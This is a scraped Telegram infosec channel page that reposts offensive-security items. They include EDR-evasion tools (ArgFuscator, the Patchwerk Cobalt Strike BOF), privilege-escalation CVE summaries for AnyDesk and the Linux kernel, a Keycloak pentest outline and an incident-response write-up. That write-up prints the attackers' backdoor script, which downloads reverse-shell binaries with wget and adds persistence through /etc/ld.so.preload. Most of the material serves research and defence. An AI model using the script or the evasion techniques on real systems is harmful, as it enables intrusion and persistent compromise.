Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Fsecurity | HH
Kanalga Telegram’da o‘tish
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Ko'proq ko'rsatish2 013
Obunachilar
-224 soatlar
-57 kunlar
-1130 kunlar
Postlar arxiv
2 009
Repost from 1N73LL1G3NC3
ArgFuscator
An open-source, stand-alone web application that helps generate obfuscated command lines for common system-native executables. Successful command-line obfuscation is likely to frustrate defensive measures such as AV and EDR software, in some cases completely bypassing detection altogether.
2 009
Repost from 1N73LL1G3NC3
Patchwerk
Cobalt Strike BOF that finds all the Nt*system call stubs within NTDLL and overwrites the memory with clean stubs (user land hook evasion). This way we can use the NTAPIs from our implant code, and if EDR check the call stack it will have originated from NTDLL. It’s pretty much the same as the original unhook by Raph Mudge, but this way there's no need to map ntdll.dll from disk or open handles to remote processes.
• Uses HellsGate & HalosGate to call direct syscalls for NtOpenProcess, NtWriteVirtualMemory, and NtProtectVirtualMemory. • Has custom GetModuleHandle & GetProcAddress(getSymbolAddress) written in C and ASM to evade hooks on kernel32. • If patching table of current process, does not use NtOpenProcess. Just uses hProc = (HANDLE)-1; instead.
2 009
Repost from APT
🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)
A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.
🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754
#windows #anydesk #lpe #cve
2 009
Repost from ESCalator
(Ex)Cobalt в контейнере 🛂
В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах.
Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории
/var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. Она содержит слои контейнеров:
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExСobalt Reverse SSHdocker save myimage:latest | gzip > myimage_latest.tar.gzCOPY, которая копировала файл update в образ, и команды запуска скрипта /bin/bash /update. Затем модифицированный образ был загружен в локальный Docker Registry.
{
"created": "2023-08-11T01:13:12",
"created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
"created": "2023-08-11T01:13:18",
"created_by": "/bin/sh -c /bin/bash /update"
}update:
#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload/etc/ld.so.preload.
/usr/lib/x86_64-linux-gnu/libssoc.so — образец ExСobalt Launcher запускает процессы /usr/bin/checks и /usr/bin/processes.
🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами.
Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке.
IoCs:
leo.rpm-bin.link mirror.dpkg-source.info e49b72e58253f4f58f9c745757eb3ab0 3bd5560b50c751c91056bfe654f9bc70 ef587305a462161682f74d0cad139caa#ir #ioc #malware @ptescalator
2 009
Repost from offsec notes
Keycloak pentest
Articles
Part 1 - Link
* Am I Testing Keycloak? * Keycloak Version Information * OpenID Configuration /SAML Descriptor * Realms (Enumeration && Self-Registration Enabled) * Client IDs * Scopes * Grants * Identity Providers * Roles * User Email EnumerationPart2 - Link
Reconnaissance * Additional Services and Ports * Interesting Local Files * Reconnaissance Conclusion Exploitation * Brute Force Login * Bypassing/Automating CSRF * JWT Signing Algorithms * Make the most out of your scopes/roles * offline_access * uma_authorization * profile * email * address * phoneTools Keycloak security scanner - Link * Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (
/realms/realm_name/)2 009
Repost from Proxy Bar
CVE-2024-36972
*
Два в одном !
Linux
LPE and Container Escape
*
vulnerability affects Linux kernel versions:
v6.8 to v6.9
v5.15.147
v6.1.78
v6.6.17
POC exploit
#Linux #lpe #container #escape2 009
Repost from GISCYBERTEAM
Lucille
Lucille — это инструмент для тестирования безопасности веб-приложений, созданный на Python. Он предлагает удобный набор инструментов, обеспечивая эффективное и практичное решение для оптимизации задач пентеста. Lucille помогает централизовать различные методы аудита и эксплуатации, упрощая процесс выявления уязвимостей.
Репозиторий:
https://github.com/jasonxtn/Lucille
Установка:
git clone https://github.com/jasonxtn/lucille.git
cd Lucille
pip install -r requirements.txtpython lucille.py
